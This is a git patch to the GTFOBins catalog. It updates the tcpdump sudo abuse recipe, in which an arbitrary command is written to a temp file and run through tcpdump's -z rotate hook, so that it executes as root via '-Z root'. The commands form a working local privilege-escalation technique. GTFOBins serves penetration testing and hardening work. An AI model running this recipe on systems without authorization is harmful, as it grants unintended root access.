From c37da57373f1b14b75b8057fa2ad98ef104af388 Mon Sep 17 00:00:00 2001
From: Syed Umar Arfeen <18597330+Anon-Exploiter@users.noreply.github.com>
Date: Mon, 23 Sep 2019 07:04:05 +0500
Subject: [PATCH] Providing user as argument using -Z

For certain distributions running tcpdump without providing -Z (user) argument
causes the provided command to be executed as the `tcpdump` user which has low
privileges by default.
---
 _gtfobins/tcpdump.md | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/_gtfobins/tcpdump.md b/_gtfobins/tcpdump.md
index 862519d..e57de31 100644
--- a/_gtfobins/tcpdump.md
+++ b/_gtfobins/tcpdump.md
@@ -17,5 +17,5 @@ functions:
         TF=$(mktemp)
         echo "$COMMAND" > $TF
         chmod +x $TF
-        sudo tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z $TF
+        sudo tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z $TF -Z root
 ---